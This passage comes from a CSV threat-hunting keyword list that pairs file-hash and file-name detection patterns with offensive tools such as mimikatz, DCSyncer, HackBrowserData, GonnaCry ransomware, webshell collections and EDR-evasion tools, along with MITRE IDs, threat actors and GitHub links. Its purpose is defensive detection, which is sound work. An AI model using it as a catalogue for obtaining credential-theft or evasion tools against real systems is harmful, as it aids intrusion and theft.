EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","40402" "*dcsyncclient.py*",".{0,1000}dcsyncclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40403" "*DCSyncer.exe*",".{0,1000}DCSyncer\.exe.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","40404" 
"*DCSyncer-master.zip*",".{0,1000}DCSyncer\-master\.zip.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","40405" "*DCSyncer-x64.exe*",".{0,1000}DCSyncer\-x64\.exe.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","40406" "*dd04c6f2ba77715ff269edd6cc092599ddf0e8c5a9f6c47282e9b24d59ec7478*",".{0,1000}dd04c6f2ba77715ff269edd6cc092599ddf0e8c5a9f6c47282e9b24d59ec7478.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40410" "*dd05c2d2a5d00de8f4ef3dd6d8e2304d2ecb3787e97edd0e38867d047b0936a0*",".{0,1000}dd05c2d2a5d00de8f4ef3dd6d8e2304d2ecb3787e97edd0e38867d047b0936a0.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","#filehash","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","40411" "*dd09d2d4ba9ffc6ddc939ede8a494a4aaadccdcfa441576499f1b85d8580f97e*",".{0,1000}dd09d2d4ba9ffc6ddc939ede8a494a4aaadccdcfa441576499f1b85d8580f97e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40412" "*dd09fce7013555b0f00b3ec47a56274ff29dafd26922c60ef0a331b4d5d299f8*",".{0,1000}dd09fce7013555b0f00b3ec47a56274ff29dafd26922c60ef0a331b4d5d299f8.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","40413" "*dd14d6cd273d756c527fc0fa4b55e5bc33518d51d713325846458df7894b0d24*",".{0,1000}dd14d6cd273d756c527fc0fa4b55e5bc33518d51d713325846458df7894b0d24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40415" "*dd15d1c8a833d00505cfb93910c5af2d98e78809c4295fd39a8bd656230205e1*",".{0,1000}dd15d1c8a833d00505cfb93910c5af2d98e78809c4295fd39a8bd656230205e1.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - 
TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","40416" "*dd16f575d6e76269c85b00dae2602c43aba8c51dfd2106c744e1fdaa2067c81f*",".{0,1000}dd16f575d6e76269c85b00dae2602c43aba8c51dfd2106c744e1fdaa2067c81f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40417" "*dd226a8ba33f50cd9ca4fedcec4df5c29e6b9841cb8cf2ab2d940bdef8a0a403*",".{0,1000}dd226a8ba33f50cd9ca4fedcec4df5c29e6b9841cb8cf2ab2d940bdef8a0a403.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","40421" "*dd307d39038a79e45a140d13c406c084fceb840317a7c53a5d929012fa409cf3*",".{0,1000}dd307d39038a79e45a140d13c406c084fceb840317a7c53a5d929012fa409cf3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40423" "*dd35d7c7b99d5a0a182ff16546ebee8af08ee92510157d6f02355bae256d6191*",".{0,1000}dd35d7c7b99d5a0a182ff16546ebee8af08ee92510157d6f02355bae256d6191.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","#filehash","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","40424" "*dd3cd4783ec400f215c4f72f797fe310be12453c20944feec054a449835feb36*",".{0,1000}dd3cd4783ec400f215c4f72f797fe310be12453c20944feec054a449835feb36.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","#filehash","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","40425" "*dd3dc6677db3402e952a4e127c19ed19a0a95772e2353734af4a94f61a27f580*",".{0,1000}dd3dc6677db3402e952a4e127c19ed19a0a95772e2353734af4a94f61a27f580.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY 
- EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40426" "*dd3f2e3349c378e1a415c4a6ad450cd3ae4ea29f3fe15d0a72bff64a44e1362a*",".{0,1000}dd3f2e3349c378e1a415c4a6ad450cd3ae4ea29f3fe15d0a72bff64a44e1362a.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40428" "*dd3f2e3349c378e1a415c4a6ad450cd3ae4ea29f3fe15d0a72bff64a44e1362a*",".{0,1000}dd3f2e3349c378e1a415c4a6ad450cd3ae4ea29f3fe15d0a72bff64a44e1362a.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - 
APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40429" "*dd4543fa5f777ca9ad6ab6bf3d53cc8f186113da38d81159c776b1476eecb5e8*",".{0,1000}dd4543fa5f777ca9ad6ab6bf3d53cc8f186113da38d81159c776b1476eecb5e8.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","40431" "*dd4f3e4b946d9f070137a899653083858ae7a973d0c3c5c2dde1c39e6d44e116*",".{0,1000}dd4f3e4b946d9f070137a899653083858ae7a973d0c3c5c2dde1c39e6d44e116.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40433" 
"*DD5BAEEE88AA8F4EF1A0421214C5D42F28786C84C8A4C3C3C3C8897F553D9347*",".{0,1000}DD5BAEEE88AA8F4EF1A0421214C5D42F28786C84C8A4C3C3C3C8897F553D9347.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40437" "*dd5cbddadb4446fe8e9558788ea449ac7f497973cf83ef9d8acc3803cfae956b*",".{0,1000}dd5cbddadb4446fe8e9558788ea449ac7f497973cf83ef9d8acc3803cfae956b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40438" "*dd6a39d94965fa111cdf668b932ada92a4da94aaf90a4d3d2bd13f6232372b77*",".{0,1000}dd6a39d94965fa111cdf668b932ada92a4da94aaf90a4d3d2bd13f6232372b77.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40440" "*dd6c8226641df9aa2a08e5e11949430e94773d763734ec3516a7976ad8d10f1a*",".{0,1000}dd6c8226641df9aa2a08e5e11949430e94773d763734ec3516a7976ad8d10f1a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40441" "*dd6e426856acc656cadd4587fa002d4fe50f3370915932256887fa3d9d016687*",".{0,1000}dd6e426856acc656cadd4587fa002d4fe50f3370915932256887fa3d9d016687.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","40442" "*dd7677e9132c0e2b813bf5a5fd4b34772d0804cf36b7266a2b9d0e64075019d0*",".{0,1000}dd7677e9132c0e2b813bf5a5fd4b34772d0804cf36b7266a2b9d0e64075019d0.{0,1000}","offensive_tool_keyword","shootback","a reverse TCP tunnel let you access target behind NAT or firewall","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/aploium/shootback","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","962","234","2020-09-12T07:31:56Z","2016-04-28T15:12:36Z","40444" 
"*dd789bbc91be5932fc0647ff4c88c3932ed9ccf2114265985c11481b6f79d848*",".{0,1000}dd789bbc91be5932fc0647ff4c88c3932ed9ccf2114265985c11481b6f79d848.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","40446" "*dd7c138a3ffae91a5a0ad5bc4478604951c7c2250c2ddadd975655b3fb9b988e*",".{0,1000}dd7c138a3ffae91a5a0ad5bc4478604951c7c2250c2ddadd975655b3fb9b988e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40447" "*dd811322b3c78642e3ca888d95f9c6f7d7b56247979358731bcac341f29c6822*",".{0,1000}dd811322b3c78642e3ca888d95f9c6f7d7b56247979358731bcac341f29c6822.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40450" "*dd820151677383a23da1dbdb9647a05b780146a0894502d6ac3a93c51e885cdb*",".{0,1000}dd820151677383a23da1dbdb9647a05b780146a0894502d6ac3a93c51e885cdb.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - 
APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","40451" "*dd86be9a1fb1198264e1a01247473be5e1498ef549a91b7c7143e5cfc25784e1*",".{0,1000}dd86be9a1fb1198264e1a01247473be5e1498ef549a91b7c7143e5cfc25784e1.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","#filehash","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","40452" "*dd8e3e6e19c02c8c43cf136edcbc76d38de044ad572198088b086e04a04360b2*",".{0,1000}dd8e3e6e19c02c8c43cf136edcbc76d38de044ad572198088b086e04a04360b2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40453" "*dd8f333bb1fe5d749e7cad5a0629089ba540367cb018a1eeef5ff1f11f0df62d*",".{0,1000}dd8f333bb1fe5d749e7cad5a0629089ba540367cb018a1eeef5ff1f11f0df62d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40454" "*dd9203bd24970aceaa30d3241a10fd259380144e57a279021b4c4378fa6c5922*",".{0,1000}dd9203bd24970aceaa30d3241a10fd259380144e57a279021b4c4378fa6c5922.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 
- TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40456" "*dd94382acb55e694ee38e1be7f5c0902be0e0d89*",".{0,1000}dd94382acb55e694ee38e1be7f5c0902be0e0d89.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","40457" "*dd962b2de10f0a44beb1483ef05afce58151e471e9d0b79b7388f663292fd634*",".{0,1000}dd962b2de10f0a44beb1483ef05afce58151e471e9d0b79b7388f663292fd634.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","40458" "*dd9740e337fc3b418598904549c3e53c95314168ab92ffe43a0383f2da79d898*",".{0,1000}dd9740e337fc3b418598904549c3e53c95314168ab92ffe43a0383f2da79d898.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","40459" 
"*dd98cb29a275ed711f9a4299c45c0e8cc8d0a746bff0c95dee0dcb05a28496af*",".{0,1000}dd98cb29a275ed711f9a4299c45c0e8cc8d0a746bff0c95dee0dcb05a28496af.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40460" "*dd9f10b0e8c87705938e6f32325901f6ce20d2c05cb0220e33d040e06378bfa4*",".{0,1000}dd9f10b0e8c87705938e6f32325901f6ce20d2c05cb0220e33d040e06378bfa4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40461" "*dda3dda6bca9be9945ccf838141b570f08b0763ff0eb74c1b17ccce22c9ceffb*",".{0,1000}dda3dda6bca9be9945ccf838141b570f08b0763ff0eb74c1b17ccce22c9ceffb.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","40463" "*ddac74d6e7f7e4877a8b82599df53f2e6854536c483f505e390e260cfe5aa6ef*",".{0,1000}ddac74d6e7f7e4877a8b82599df53f2e6854536c483f505e390e260cfe5aa6ef.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory 
environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","40466" "*ddacbf2fc85fd85cdbe8016b19f2f783acb17dbaf6361e9827039885d382e8d2*",".{0,1000}ddacbf2fc85fd85cdbe8016b19f2f783acb17dbaf6361e9827039885d382e8d2.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#filehash","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","40467" "*ddaecd7689624555334daa031c1a7e30c628cc6fbc5327c6c4efdf492444aeae*",".{0,1000}ddaecd7689624555334daa031c1a7e30c628cc6fbc5327c6c4efdf492444aeae.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40468" "*ddb178cbaaab362c61d3d061b366625d205f208553ddf341b1c8fae466e5bd6f*",".{0,1000}ddb178cbaaab362c61d3d061b366625d205f208553ddf341b1c8fae466e5bd6f.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the 